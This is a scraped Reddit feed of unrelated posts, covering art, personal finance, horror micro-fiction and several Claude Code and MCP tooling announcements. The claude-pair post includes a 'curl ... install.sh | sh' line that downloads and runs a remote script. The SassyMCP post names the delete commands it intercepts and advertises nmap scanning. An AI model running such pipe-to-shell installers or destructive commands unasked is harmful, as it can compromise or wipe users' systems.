I’ve been struggling with depression and BPD since this year started. I try to do better but I feel so alone; lately I’ve just isolated myself from the world and I feel like I’m late to everything. A toast would help.

r/Art Hour-Help9480

Moon walker, kyushime, pencil, 2022 [OC]

r/TwoSentenceHorror Original-Loquat3788

It was a very religious country, and she'd gone under anaesthesia and into the caesarean surgery under a cloud of shame because there was no man with her.

Clutching her newborn close, she glimpsed something on the baby's leg, the surgeon's phone number in small, even handwriting and a message: 'single?'

r/personalfinance Ok-Objective726

Where should I be keeping my money to help it grow?

[AUD] I am an 18 year old who just graduated high school and has been working for around 2 years. I have just over 10k saved but I’m not saving for anything in particular and only recently started taking saving seriously. I have the money in a savings account but I feel like it could be growing in a more effective way if I put it somewhere else (idk where). Recently I have been contributing $400 weekly to my savings and I’m wondering if there is something I should be doing with my money that would give me better results in the long run. I want low risk but don’t know where to start or what to do.

r/ClaudeAI madeo216

I built a fully automated daily AI news podcast using Claude Code + ElevenLabs

I wanted to share a project I recently launched: a daily AI news podcast that runs entirely on its own. The whole thing started as me wanting to prove I could build something end-to-end with AI tools. It is called Build By AI and it's now live and publishing episodes regularly.

Claude Code helped code the whole thing. Besides that, I used ElevenLabs to convert the script to audio and Buzzsprout for publishing, both via their APIs.

Happy to answer questions about the pipeline or any of the tools! Would you actually listen to one, knowing there is no human host behind it? Or does that put you off?

r/metaldetecting USAR_gov

"Egyptiomania" button

Tiny aluminum button featuring the bust of Nefertiti, dating from 1930-1960. The motif was quite trendy at the time, during the Egyptomania period and the craze caused by the discovery of tombs such as King Tut's.

r/painting FickleSample5631

art by belko - debt is paid 2026

r/findareddit WildEnchantresss

Is there a subreddit where people deep-dive into random obsessions for a week and report back?

r/funny Life_Ad_1928

Microwave

r/midjourney dietpapita

Spent months making a short film series entirely with AI. Here's Episode 1 :)

Tried very hard to push the models to create a world that looks and feels real. Would love to hear what y'all think!

r/TwoSentenceHorror Original-Loquat3788

On his travels, the magician sometimes met 'snakeoil salesmen', and he thought how similar they were, skipping town the same day, promising folks they just needed to wait and see.

The main difference was that the magician was no fraud; he just had no idea how to bring people back from the box.

r/ProgrammerHumor BranchCurrent4141

takeMyDataTrainYourModels

r/ClaudeCode orbiteleven

Skills & Agents: build or install?

I'm trying to up my skills/agents game.

It seems like there are a gazillion websites with libraries of skills and agents. It's hard to tell how many of them are actually worth using and how many are just AI slop in their own right.

How many people build their own vs. use them from a library? If the former: what are you building? If the latter: what are you using?

r/ClaudeCode This-Establishment26

I built a CLI to pair program on Claude Code sessions over SSH

I wanted a way to share a live Claude Code session with a colleague like pair programming, so I built claude-pair.

I call it pair vibe-coding :D

How it works:
- Host runs `claude-pair host`, gets an SSH link
- Guest runs `ssh TOKEN@uptermd.upterm.dev` — no install needed
- Both see the same Claude Code terminal in real time

Built in Go, uses upterm for NAT traversal and tmux for session sharing. MIT licensed.

GitHub: https://github.com/albertnahas/claude-pair

Install: `curl -fsSL https://raw.githubusercontent.com/albertnahas/claude-pair/main/install.sh | sh`

Would love feedback — especially on what features would make this more useful for your team.

r/AlternativeHistory Rathskellarington

Temple Science - looking forward to debunks

This whole channel is a goldmine

r/OldSchoolCool BitterBedroomm

Rachel Weisz, The Mummy, 1999

r/SideProject Weary_Parking_6631

Updated this baby, not sure if this should be just an edit to my original, but I added a ton

https://noicemaze.com/

- added touch
- added gyro
- relaxing sound
- sky effects
- different styles
- levels

touch is only for mobile
will likely rethink the controls for desktop as well

r/AbstractArt FickleSample5631

I like it 2026

art.by.belko

r/Anthropic cbbsherpa

The Relationship Anthropic Couldn’t See

Inspired by: Peters, J. (2026, April 3). Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra. The Verge.

Anthropic had a real problem. Third-party tools like OpenClaw were burning through compute at rates their subscription pricing was never designed to absorb. By some accounts, a single “hello” through OpenClaw consumed 50,000 tokens worth of orchestration overhead. That’s a hundred times what the same interaction costs natively. At scale, with Claude topping the App Store charts after an OpenAI boycott flooded them with new users, the math stops working.

So they cut it off. On a Friday evening, via email, with one day’s notice.

The infrastructure pressure was real. The competitive motive was also real. And the way Anthropic handled both reveals something important about how AI platforms see their ecosystems: in aggregate, not in relationships. That’s the failure worth examining.

The Timeline Nobody Mentions

Most coverage treats April 3rd as the story. It’s actually the last chapter of a months-long escalation.

In January 2026, Anthropic began implementing technical blocks against third-party harnesses impersonating official clients. In February, they updated Claude Code documentation and legal terms to explicitly prohibit using OAuth tokens from subscription accounts in external tools. OpenCode removed Claude Pro/Max support, citing “Anthropic legal requests.” Community backlash followed. Thariq Shihipar, from Anthropic, apologized for confusing documentation but held the policy line.

Then March happened. OpenAI’s Pentagon deal triggered a user boycott, and Claude briefly topped the US App Store. Anthropic temporarily doubled usage caps to manage the surge. Demand was real and growing fast.

April 3rd: the email. Starting April 4th at 3PM ET, Claude subscriptions would no longer cover third-party harnesses including OpenClaw. Users would need to switch to pay-as-you-go billing or use the API directly.

One more detail that most reporting buries in the middle paragraphs: Peter Steinberger, OpenClaw’s creator, had recently joined OpenAI. He and OpenClaw board member Dave Morin reportedly tried to negotiate with Anthropic. The best they managed was a one-week delay.

The Token Problem

This part complicates the clean narrative of a platform betraying its developers.

OpenClaw isn’t a thin wrapper that passes your prompt to Claude and returns the response. It’s an orchestration layer. Every interaction gets wrapped in system prompts, memory retrieval, context injection, tool-use scaffolding, and reflection loops before Claude sees anything resembling your actual request. That makes for a useful, persistent, context-aware AI assistant. The cost is that a simple exchange can consume orders of magnitude more tokens than the same exchange through Claude’s native interface.

Flat-rate subscriptions are priced around expected usage patterns. When a third-party tool introduces a 100x multiplier on token consumption per interaction, those economics break. Not theoretically. Actually. Anthropic is eating real compute costs that $20 or $200 a month was never designed to cover.
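The arithmetic here is easy to sketch. Below is a minimal back-of-envelope calculation using invented but plausible numbers (the native token cost per turn and the blended compute price are assumptions) together with the post's claimed ~100x multiplier:

```python
# Back-of-envelope sketch of the subscription math described above.
# All numbers are illustrative; only the 100x multiplier comes from the post.

NATIVE_TOKENS_PER_TURN = 500       # assumed native cost of a simple exchange
HARNESS_MULTIPLIER = 100           # post's claim: ~100x orchestration overhead
COST_PER_MILLION_TOKENS = 15.0     # assumed blended $ per 1M tokens of compute

def monthly_compute_cost(turns_per_day: int, tokens_per_turn: int) -> float:
    """Rough monthly compute cost for a user at a given usage rate."""
    tokens = turns_per_day * 30 * tokens_per_turn
    return tokens / 1_000_000 * COST_PER_MILLION_TOKENS

native = monthly_compute_cost(50, NATIVE_TOKENS_PER_TURN)
harness = monthly_compute_cost(50, NATIVE_TOKENS_PER_TURN * HARNESS_MULTIPLIER)

print(f"native:  ${native:,.2f}/month")    # comfortably under a $20 subscription
print(f"harness: ${harness:,.2f}/month")   # two orders of magnitude more
```

With these assumed numbers a native user costs about $11/month to serve, while the same usage through a 100x harness costs over $1,000, which is the sense in which a flat $20 or $200 tier "breaks."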

This matters because dismissing the capacity argument as pretext weakens any serious analysis of what happened. The infrastructure problem was genuine. Acknowledging it doesn’t require accepting that Anthropic’s response was proportionate or well-handled. It just means the story is more complicated than “platform screws developers.”

The Platform Trap Is Still Real

The capacity problem explains why Anthropic acted. It doesn’t explain how.

A company facing unsustainable compute costs from a subset of users has options. Graduated pricing tiers. Usage caps specific to high-overhead tools. Direct engagement with the developers whose tools are generating the load. Transition periods that let affected users adjust.

Anthropic chose a blanket cutoff, communicated on a Friday evening, with roughly 18 hours’ notice. No grandfather clause. No tiered approach. No public distinction between lightweight integrations and heavy orchestration layers.

Meanwhile, Claude Cowork, Anthropic’s own orchestration tool, was waiting in the wings. Google had already suspended Gemini accounts for users accessing models through OpenClaw. The industry direction is consistent: native interfaces get more capable, third-party access gets more expensive, and the orchestration layer that developers built to fill the gap becomes the next thing the platform wants to own.

That’s the platform trap, and the fact that Anthropic had a legitimate capacity problem doesn’t make it less of one. If anything, the capacity problem gave them the cover to execute a competitive repositioning that might have drawn sharper scrutiny otherwise.

The Failure of Relational Granularity

Here’s what I think the actual story is.

The market reaction to April 3rd split into two groups that were angry about different things.

Group one built heavy orchestration layers. They were running persistent memory systems, multi-step chains, the full OpenClaw stack. Their token consumption was genuinely outsized. For them, moving to API pricing or pay-as-you-go is arguably the correct economic model. They were getting enterprise-grade compute at consumer-subscription prices. That was always going to end.

Group two built lightweight integrations. Maybe they used OpenClaw for basic task automation, or they’d built small personal workflows that didn’t consume dramatically more than native usage. They weren’t the problem. But they were caught in the same policy change, subject to the same Friday-evening email, facing the same abrupt cutoff.

Anthropic’s response couldn’t tell them apart. The platform saw aggregate load from third-party harnesses. It didn’t see individual relationships with individual developers consuming resources at wildly different rates. So it applied a blunt instrument to a problem that called for a scalpel.

This is a failure of relational granularity. And it’s the failure that actually damages trust, because the developers in group two, the ones who would have accepted the reasoning if it had been applied fairly, now have the same distrust as everyone else. They learned that the platform can’t see them clearly enough to treat them right. That lesson doesn’t go away when the next policy change arrives.

The same pattern is in how the communication was handled. A Friday evening email with 18 hours’ notice treats every affected user identically: as someone who will absorb the change on Anthropic’s timeline. It doesn’t distinguish between someone running a business on this stack and someone with a weekend project. Everyone gets the same deadline.

Platforms that can’t see their ecosystem at relational resolution will keep making this mistake. Not because they’re malicious, but because their operational infrastructure literally doesn’t have the capacity to act on distinctions it can’t perceive.

What Builders Should Actually Take From This

The useful lesson isn’t “don’t use third-party AI tools.” It’s more specific than that.

First: distinguish between building with a model and building on one. Building with a model means using it as a component in a system that could swap it out with meaningful but manageable effort. Building on a model means your workflow is so tightly coupled to one provider that any policy change is a structural problem. The further toward “building on” you sit, the more exposed you are.
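The distinction can be made concrete. Here is a hypothetical sketch of "building with" a model: the provider sits behind a narrow interface, so a policy change means swapping one adapter rather than restructuring the workflow. All names are illustrative, not a real SDK:

```python
# "Building with" a model: the workflow depends only on a narrow protocol,
# so the provider is a swappable component, not a structural dependency.
from typing import Protocol

class ChatModel(Protocol):
    def complete(self, prompt: str) -> str: ...

class FakeClaude:
    def complete(self, prompt: str) -> str:
        return f"[claude] {prompt}"

class FakeLocalModel:
    def complete(self, prompt: str) -> str:
        return f"[local] {prompt}"

class Workflow:
    """Everything here depends only on the ChatModel protocol."""
    def __init__(self, model: ChatModel):
        self.model = model

    def summarize(self, text: str) -> str:
        return self.model.complete(f"Summarize: {text}")

# Swapping providers is a one-line change at the composition root:
print(Workflow(FakeClaude()).summarize("quarterly report"))
print(Workflow(FakeLocalModel()).summarize("quarterly report"))
```

"Building on" a model is the opposite shape: provider-specific prompts, token accounting, and policy assumptions scattered through the workflow, so there is no single seam to swap at.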

Second: treat model diversity the way you’d treat infrastructure redundancy. Multi-model architectures are more complex initially, but they provide real resilience against overnight policy changes. OpenClaw itself supports multiple model backends. The users who had already configured alternatives were inconvenienced. The users who were Claude-only were stranded.

Third, and this is the one that comes out of the relational analysis: even if you aren’t the problem user, you’re subject to the same policy as the one who is. Your risk assessment can’t just ask “will the platform change its terms?” It has to ask “can the platform see me clearly enough to change them fairly?” If the answer is no, you’re carrying risk that has nothing to do with your own behavior.

What Comes Next

Foundation model providers and their ecosystems are still working out what the long-term relationship looks like. Anthropic, OpenAI, and Google are all testing how much friction the market will absorb, how much restriction builders will tolerate, and how much of the orchestration layer they can reclaim before the ecosystem pushes back.

The companies that win this, not just in revenue but in durable market position, will be the ones that learn to see their ecosystems at the resolution of actual relationships rather than aggregate usage curves. That means pricing that reflects what individual users actually consume. Communication that acknowledges different stakes for different builders. Transition periods that respect the investments people have made on your platform.

For anyone building orchestration layers, relational AI companions, or anything that requires AI to operate across time rather than in isolated moments, the message is pointed. That orchestration layer is where the real value lives. It’s also exactly where platform control is tightening. The gap between what native interfaces offer and what serious AI workflows require is real and persistent.

But the providers who own the underlying models have noticed that gap too, and they’re building toward closing it on their own terms. We should build with that reality in mind.

r/DunderMifflin lalalalalalal6666

My favorite episodes so far, any I am missing?

I’m binging The Office for the first time (currently halfway through season 5) but only just made a list (not ranked) of my favorite episodes to this point. Wondering if there are any others I missed/should watch again?

r/comfyui Zeinscore32

[ Removed by Reddit ]

[ Removed by Reddit on account of violating the content policy. ]

r/Anthropic Illustrious-Bug-5593

I left an AI loop running overnight. Woke up to 20 shipped agents.

Repo: https://github.com/Dominien/agent-factory

So last month Karpathy dropped autoresearch. Autonomous loop, runs experiments overnight, keeps what works, throws away what doesn't. I watched it blow up and thought, this pattern is sick. But I don't do ML. I don't have training runs to optimize. What I do have is a problem: finding good ideas to build.

In 2026, finding a problem worth solving is harder than actually solving it. Every obvious pain point has 12 SaaS tools already fighting over it. The interesting stuff is buried in Reddit threads at 2am where someone rants about something nobody's built for. I used to scroll those manually. Now I don't.

I took that same loop pattern and pointed it somewhere else. My system scrapes Reddit, HN, GitHub, and Twitter for real problems. Scores them on demand, market gap, feasibility. If something clears the threshold it builds a standalone AI agent, validates it works, and commits it. The threshold ratchets up every build so the ideas have to keep getting better. Leave it running overnight, wake up to new agents.
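The control flow described here (score each idea, build on a pass, then raise the bar) can be sketched in a few lines; `score_idea` and `build_agent` are hypothetical stand-ins for the real scraping, scoring, and building steps:

```python
# Minimal sketch of the ratcheting-threshold loop described above.
# score_idea() and build_agent() are stand-ins; only the control flow matters.
import random

def score_idea(idea: str) -> float:
    # stand-in for scoring on demand, market gap, and feasibility
    return random.random() * 10

def build_agent(idea: str) -> str:
    return f"agent-for-{idea.replace(' ', '-')}"

def run_session(ideas, threshold=5.0, ratchet=0.25):
    shipped = []
    for idea in ideas:
        if score_idea(idea) >= threshold:
            shipped.append(build_agent(idea))
            threshold += ratchet   # the bar rises after every build
    return shipped, threshold

random.seed(42)
agents, final_bar = run_session(["tax deductions", "overtime rules", "opt-outs"])
print(agents, final_bar)
```

The ratchet is the interesting design choice: each shipped agent raises the threshold, so an overnight run can only keep producing if the ideas keep getting better.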

First session it found freelancers asking about missed tax deductions, built freelancer-deduction-finder. Found people confused about overtime exemptions, built wage-rights-advisor. Found people overwhelmed by data broker opt outs, built data-broker-opt-out. 20 agents shipped so far.

Now let me be real because I know someone's going to ask. How do you verify quality? Honest answer: not fully automated. The system boots each agent, sends a test prompt, checks if the output is useful. But these are MVPs. Some are rough. The point was never "autonomous startup factory." I wake up, look at what shipped, pick the most promising one, and that becomes my next real project. It's an idea machine that also writes the first draft. When every obvious idea feels taken, that's the part that matters.

Three files. program.md tells Claude Code where to research and what bar to hit. seed/ is a minimal Next.js template with 7 tools. run.sh launches Claude Code headless and auto restarts on context limits. No LangChain, no CrewAI. TypeScript, MIT, runs on OpenRouter or Ollama. Each agent is standalone, clone and run.

r/personalfinance JMinsk

Moving money from big bank to small investment firm?

Hi all, I had a sudden windfall about 5 years ago and started taking money management more seriously, but I'm for all intents and purposes an investing novice.

Prior to the windfall I was banking with Chase for my regular checking and savings accounts and managing my work-sponsored 401k separately. I basically walked into a Chase branch with Private Client services, explained the situation, liked the guy that I talked to, and have had the same financial advisor at Chase for the last five years. I probably could have done more research upfront, but the windfall was an inheritance and I was also executor of the (complicated) estate, so there was a LOT going on at that point in time. I also used Chase for the estate account while in probate.

I currently have ~750k mostly in a managed brokerage account, with ~200k split between an inherited IRA and a managed retirement fund (rolled over my previous 401k when I changed jobs last year). I've had great returns over the last few years, but it just seems like I was lucky in terms of market timing.

Fast forward: the advisor I was working with at Chase is moving to the Bahnsen Group, a smaller firm that I know nothing about aside from browsing their website. I really liked my advisor and he was extremely patient and thorough with my Finance 101 questions when I was first setting everything up. We check in a couple times a year and talk through my goals, but I've mostly taken a "set it and forget it" approach. I guess now I have the option of transitioning to a new advisor with Chase or switching over to the Bahnsen Group with my previous guy.

This is definitely an "I don't know what I don't know" situation. What questions should I even be asking or looking into to make this decision? What are the pros/cons of a big bank v. small firm for financial advisory? At face value, I like that everything is integrated now at Chase and all of my finances are in one place, on the other hand I liked and trusted the guy I've been working with for five years.

r/LifeProTips jtho78

LPT: If you are trying to reduce consumption of microplastics, chewing gum and using aluminum cans is a good place to start.

Edit: "...a good place to start removing from your life"

I'm surprised by the number of folks who don't know that most chewing gum is made from a synthetic plastic, and soda/food cans are lined with a plastic layer.

There are alternative gum base options made from tree sap. Soda Stream makes a glass option and the bottles are designed for personal use.

r/ClaudeAI gsummit18

Sub-agent use: Sonnet vs Haiku

I’m curious what models people are using for sub-agents, and how that setup is actually working out in practice.

At the moment I’ve got my main Claude Code instance running on Claude Opus, which then dispatches Claude Sonnet sub-agents for most tasks, and only uses Haiku for more mechanical or repetitive work.

The prompts coming from Opus are fairly detailed and structured, so in theory even Haiku should be able to handle things reasonably well - but I’m not entirely convinced yet.

Would be great to hear how others are approaching this - how you’re splitting orchestration vs execution, where you draw the line between Sonnet and Haiku, and whether you’ve noticed any consistent failure patterns or advantages.

r/PhotoshopRequest katybobaty

Appearance edit request

Hi! Could someone please 1) remove the hair from my (the girl) mouth, and 2) make my acne look less bad (particularly on the forehead)?

Thank you so much!!

r/funny _ganjafarian_

English be easy - Part 2

r/findareddit beasontoyou4343

Finding a convicted felon?

Is there a subreddit to help find felons?

r/PhotoshopRequest kittykittycatxx

Can someone edit out the guy in the middle for me?

I love this pic of me and my friend but without the guy in the middle lol

r/SideProject Then-9999

How do you validate an idea before building?

I’m trying to avoid making the same mistake again (building something nobody wants).

Curious how others do this in practice.

Do you:

- build a landing page?

- talk to people first?

- run ads?

- post on Reddit?

What has actually worked for you (not theory)?

Would love real examples.

r/comfyui alivinci

Need prompt help

I'm a newbie to this whole thing, so I need help with a prompt. I want to create an image that has a pop-out bubble showing a view that can't otherwise be seen.

Assume a character is standing with his hand hidden behind his back; I want to prompt it so that a pop-up bubble shows the hidden hand is, say, holding a knife. I'm using an Illustrious model.

r/LiveFromNewYork Sure-Ad-2465

As a person with ADHD I feel seen lol

r/ClaudeCode Specialist-Leave-349

How can I finally get Claude to feel free to just fetch and websearch whatever it wants? I'm sick of having to approve this.

My local settings already include this:

 "allow": [ "WebFetch(**)", "WebSearch(**)" ] 

So why does he not just do it? So annoying

r/aivideo Accomplished-Tax1050

Prompt share: one-take battlefield run with a final aerial reveal

r/DunderMifflin EveTheAlien

Michael Scott Frutiger Aero wallpaper pt 2

I've been cranking these out and will continue to until I make the perfect wallpaper. IDK if it's frutiger aero or just y2k

r/ClaudeAI CapableOrange6064

Context full? MCP server list unwieldy? I replaced at least 75 MCP servers and made some new ones like Deletion Interception. Looking for beta testers for my self-modding, network scanning, system auditing powerhouse MCP. So avant-garde it's sassy. The beta zip has all the optional dependencies.

I did a thing. This isn't a one-prompt-and-done vibe-coded disaster. I've been building and debugging it for weeks, hundreds of hours spent syncing tooling across sessions and systems. This is not a burner account; it's the new one for my LLC. Try it out, I don't think you'll go back to the old way. Stay sassy, folks. Summary of the tool below (apologies for the sales monster in me):

I'll cut straight to it.

The MCP ecosystem is a mess. You need file operations — install Filesystem. Terminal? Desktop Commander. GitHub? The official GitHub MCP server — which has critical SHA-handling bugs that silently corrupt your commits. Desktop automation? Windows-MCP. Android? mobile-mcp. Memory? Anthropic's memory server. SSH? Pick from 7 competing implementations. Screenshots? OCR? Clipboard? Network scanning? Each one is another server, another config block, another chunk of your context window gone.

I've been building SassyMCP: a single Windows exe that consolidates all of this:

  • 257 tools across 31 modules — filesystem, shell (PowerShell/CMD/WSL), desktop automation, GitHub (80 tools with correct SHA handling), Android device control via ADB, phone screen interaction with UI accessibility tree, network scanning (nmap), security auditing, Windows registry, process management, clipboard, Bluetooth, event logs, OCR (Tesseract), web inspection, SSH remote Linux, persistent memory, and self-modification with hot reload
  • 34MB standalone exe — no Python install, no npm, no Docker. Download and run.
  • Beta zip ships with ADB, nmap, plink, scrcpy, and Tesseract OCR bundled — nothing extra to install
  • Smart loading — only loads the tool groups you actually use, so you're not burning 25K tokens of context on tool definitions you never touch
  • Works with Claude Desktop, Grok Desktop, Cursor, Windsurf — stdio and HTTP transport
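As a sketch of what "smart loading" might look like (the group names, registry shape, and token framing are invented for illustration, not SassyMCP's actual internals): tool groups are registered as factories and only materialized on first use, so unused groups never spend context on their definitions.

```python
# Hypothetical sketch of lazy tool-group loading: groups are registered as
# factories and only built (i.e. only cost context) when first requested.
REGISTRY = {
    "filesystem": lambda: ["read_file", "write_file", "list_dir"],
    "github":     lambda: ["create_commit", "open_pr"],
    "network":    lambda: ["nmap_scan", "port_check"],
}

class LazyToolServer:
    def __init__(self):
        self.loaded = {}

    def tools_for(self, group: str):
        # materialize a group only when a session actually asks for it
        if group not in self.loaded:
            self.loaded[group] = REGISTRY[group]()
        return self.loaded[group]

srv = LazyToolServer()
srv.tools_for("filesystem")
print(sorted(srv.loaded))   # only the groups you touched are loaded
```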

A few things I think are worth highlighting that I haven't seen in other MCP servers:

Phone pause/resume with sensitive context detection. The AI operates your Android phone, hits a login screen, and the interaction tools automatically refuse to execute. It reads the UI accessibility tree, detects auth/payment/2FA screens, and stops. You log in manually, tell it to resume, and it picks up where it left off — aware of everything it observed while paused.
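A minimal sketch of how such a detector could work, assuming a flattened accessibility tree of text nodes; the marker keywords and tree shape are my guesses for illustration, not SassyMCP's actual logic:

```python
# Illustrative pause-on-sensitive-screen check: scan UI text nodes for
# auth/payment markers and refuse to act if any are present.
SENSITIVE_MARKERS = {"password", "2fa", "verification code", "card number", "cvv"}

def is_sensitive(ui_tree: list[dict]) -> bool:
    for node in ui_tree:
        text = (node.get("text") or "").lower()
        if any(marker in text for marker in SENSITIVE_MARKERS):
            return True
    return False

def tap(ui_tree, x, y):
    # every interaction tool checks the current screen before acting
    if is_sensitive(ui_tree):
        raise PermissionError("Sensitive screen detected; pausing for manual input")
    return f"tapped ({x}, {y})"

login_screen = [{"text": "Enter your password"}, {"text": "Forgot password?"}]
home_screen = [{"text": "Inbox"}, {"text": "Calendar"}]

print(tap(home_screen, 10, 20))      # proceeds normally
try:
    tap(login_screen, 10, 20)
except PermissionError as e:
    print(e)                         # refuses and waits for the human
```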

Safe delete interception. AI agents hallucinate destructive commands. Every delete-family command (rm, del, Remove-Item, rmdir, etc.) across all shells is intercepted. Instead of destroying your files, targets get moved to a _DELETE_/ staging folder in the same directory for you to review. Because "the AI deleted my project" shouldn't be a thing.
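A rough sketch of the staging idea under stated assumptions (naive command parsing, a flat argument list, no globbing); this is not the real implementation, only the shape of it:

```python
# Sketch of delete interception: instead of executing a delete-family
# command, move each target into a _DELETE_/ staging folder for review.
import shutil
import tempfile
from pathlib import Path

DELETE_COMMANDS = {"rm", "del", "rmdir", "remove-item"}

def intercept(command: str, cwd: Path) -> list[Path]:
    """Stage delete targets in _DELETE_/ instead of destroying them."""
    parts = command.split()
    if not parts or parts[0].lower() not in DELETE_COMMANDS:
        raise ValueError("not a delete-family command")
    staged = []
    for arg in parts[1:]:
        if arg.startswith("-"):   # skip flags like -rf
            continue
        target = cwd / arg
        staging = target.parent / "_DELETE_"
        staging.mkdir(exist_ok=True)
        dest = staging / target.name
        shutil.move(str(target), str(dest))
        staged.append(dest)
    return staged

# usage: the "deleted" file survives in _DELETE_/ for review
with tempfile.TemporaryDirectory() as d:
    root = Path(d)
    (root / "notes.txt").write_text("keep me")
    staged = intercept("rm notes.txt", root)
    print(staged[0].read_text())
```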

The GitHub module actually works. The official GitHub MCP server has a well-documented bug where it miscalculates blob SHAs, leading to silent commit corruption. SassyMCP uses correct blob SHA lookups, proper path encoding, atomic multi-file commits via Git Data API, retry logic with exponential backoff, and rate-limit awareness. It also strips 40-70% of the URL metadata bloat from API responses so you're not wasting context on gravatar_url and followers_url fields.

Here's what it replaces, specifically:

| Domain | Servers replaced | Notable alternative |
|---|---|---|
| Filesystem / editing | 11 | Anthropic's Filesystem |
| Shell / terminal | 5 | Desktop Commander (5.9k stars) |
| Desktop automation | 9 | Windows-MCP (5k stars) |
| GitHub / Git | 5 | GitHub MCP Server (28.6k stars) |
| Android / phone | 9 | mobile-mcp (4.4k stars) |
| Network + security | 16 | mcp-for-security (601 stars) |
| SSH / remote Linux | 7 | ssh-mcp (365 stars) |
| Memory / state | 7 | mcp-memory-service (1.6k stars) |
| Windows system | 13 | Windows-MCP (5k stars) |

It's free, it's open source (MIT), and the beta is fully unlocked — all 257 tools, no gating.

Download: github.com/sassyconsultingllc/SassyMCP/releases

The zip package includes the exe plus all external tools bundled. Unzip, run start-beta.bat, and add the custom connector to the URL it creates. Full readme within.

I'm looking for beta testers who are actually using MCP daily and are sick of the fragmentation. If something doesn't work, open an issue. I'm not going to pretend this is perfect — it's a beta. But it works, it's fast, and it's one config block instead of ten.

Windows only for now. If there's enough interest I'll look at macOS/Linux.

r/homeassistant Frequent-Limit3706

Fully Kiosk draining battery on Lenovo Tab M11 (3–4 charges/day, screen mostly OFF)

Hey,

I’m using Fully Kiosk Browser on a Lenovo Tab M11 for a Home Assistant wall dashboard.

  • Screen timeout: 30s → screen is OFF most of the time
  • Motion detection: OFF
  • No reloads
  • No cameras on main page

Still, the battery drains like crazy.

I have to charge it 3–4 times a day, which makes no sense.

For comparison, I have a Samsung tablet (no Fully Kiosk) with similar usage, and it lasts several days.

So it really feels like Fully is preventing deep sleep or keeping something active in the background.

Anyone experienced this?

Is there a difference between “screen off” and “real screen off” or some hidden setting causing this?

Thanks 🙏

r/painting megish2669

Ongoing oil painting 🫐🌸🍥

(First time painting sea creatures.) I've been messing around with the colors to try and make them more vibrant and « dreamy » :P Constructive criticism is more than welcome!!

r/LocalLLM padumtss

Can somebody please explain?

So I've been looking into this local LLM stuff and trying to find information on it, but everything seems so mixed and confusing. Basically, some people say you need a $10k supercomputer to run LLMs locally, while others say your phone can run them.

I have a PC with an RX 7800 XT GPU (16GB VRAM) plus 32GB of DDR4-3200 RAM. Is this enough to run local LLMs and do anything useful?

r/nextfuckinglevel Appropriate-Push-668

Cashier ready to throw some hands after seeing that suspicious guy outside the shop.

r/explainlikeimfive Reasonable_Fold_4799

Eli5 how box/tower fans run for years without needing any additional grease?

They run 16-18 hrs non-stop with no maintenance whatsoever, but their parts are constantly spinning and creating some kind of friction, right?

r/VEO3 Electronic-Hippo2105

I wasted a full 5,000 credits just trying to make 3 characters run smoothly.

I spoke way too soon in my previous message; the video creation mechanics are seriously lacking.

r/geography Olav-Jen

Norway. Where are similar places?

share your impressions)

r/leagueoflegends CaptainJaxSparrow

My teammates are getting muted by me without my consent. Why?

First of all my chat is set to team. I don't mute anyone but sometimes I tell someone something such as "Can you come to drake" but they don't say anything. Then I started to check mute button regularly and realized my teammates are muted as if I muted them. I can unmute them from the scoreboard but I think it's pretty weird that they are getting muted automatically. It's annoying to constantly unmute my teammates even though I never muted them. Just to make things clear, I'm not talking about them muting themselves.

Why is this happening? I never had something like this until this season.

r/SideProject beingfounder101

I'm 18 and I built a side project nobody asked for, turns out everybody needed it

If you are a freelancer, consultant, agency owner or anyone who sends proposals and invoices you already know the feeling. Great call, client loves everything, you send the proposal and then nothing. No yes. No no. Just silence while you sit there wondering if you should follow up again or just accept it is dead.

I could not find a single tool built for that specific moment so I built it.

You send the client a page with the scope, price and cancellation terms. One button at the bottom. They click I Agree and you get instant confirmation. They don't click it and you have your answer too. No more chasing. No more guessing. No more working for free and hoping.

The penalty clause is not punishment. It is a filter. It tells you in 24 hours whether the deal was ever real.

The tool: still early, still building. Would love to know what you think is broken about it.

r/leagueoflegends raphkun

Huge spread in ranks in my ranked games

In my ranked games I frequently have people ranging between Emerald 3 and D2, and I even had a few games with Masters players while climbing out of Emerald.

Is anyone else seeing a large variance in the ranks of players within a single game?

r/SideProject MichaelK_K

Just released my first ever game on PlayStore

Rubik's Cube 2D - a 2D interpretation of the Rubik's Cube puzzle

20 unique levels with various game mechanics, a lot of cats, and NO interstitial ads

You can have a look at the Gameplay preview trailer (link: https://youtube.com/shorts/0WaEzboNutE?feature=share) and download the game to try it yourself from the link below:
https://play.google.com/store/apps/details?id=com.gadeosh.rubikscube2d&pcampaignid=web_share
You're welcome to give any feedback in the comments section or dm. It would be very helpful:)

r/AccidentalSlapStick Okay_Pain

Go! BWAH!

r/coolguides Cautious_Employ3553

A Cool Guide to How the Instagram Algorithm Works

r/photoshop TopOne6678

Export PSD file edits to preset

Hey people, is it possible to export my color and layer adjustment edits to a preset? So that I can apply it the next time easily? And not have to guesstimate my last edits every time?

Or anything else I can do to streamline the process?

r/funny clarkredman_

"Can we use Mickey Mouse or Mario as our mascot?" "No, but don't worry I gotchu fam".

r/TwoSentenceHorror TopSituation1649

They only told me one thing: pronounce what’s on this paper correctly, or die

As a bilingual I thought my life would be easily spared… until I looked down and saw printed in bold red: “月”

r/DunderMifflin sjtimmer7

Is Toby the Alan Harper/Ross Geller of The Office US universe?

I just watched Toby tell his story about the girl that he followed to Scranton when he was a missionary, and that he is now divorced from her. That's two divorces. Is he becoming the staple of the show as the divorcer? The Divorce Force?

r/HistoryPorn Extra-Video-5349

Varg Vikernes is escorted by police following his arrest on 19 August 1993, shortly after the killing of Øystein Aarseth in Oslo, a case that shook Norway’s black metal scene [640x640]

r/WouldYouRather Alexander_Swan2003

WYR: Your best friend or Partner?

You, your best friend and partner are going on a few days long road trip. You have known your best friend for 10 years and your partner for 4 months.

You are driving, who is sitting next to you in the car? Your best friend, or partner?

(let’s say in this scenario that both are the same sex.)

View Poll

r/ClaudeCode arex1337

Fix for Claude in Chrome screenshots showing blank/black after scrolling

If you use the Claude in Chrome MCP extension and take screenshots of web pages, you've probably noticed that scrolling down produces blank screenshots — just the page background color where content should be.

After a lot of debugging, I figured out the root cause and a reliable workaround.

The problem: Chrome's captureVisibleTab API (which the extension uses) only captures content that was in the initial viewport when the page loaded. Content below the fold is lazily rendered for your screen but never composited for the screenshot API. This affects ALL websites — not just yours.

What we ruled out:

  • Not related to IntersectionObserver or scroll-reveal animations
  • Not related to hardware acceleration (tested with it disabled)
  • Not related to CSS opacity or visibility
  • Reproduces with both the MCP scroll tool and JS window.scrollTo()

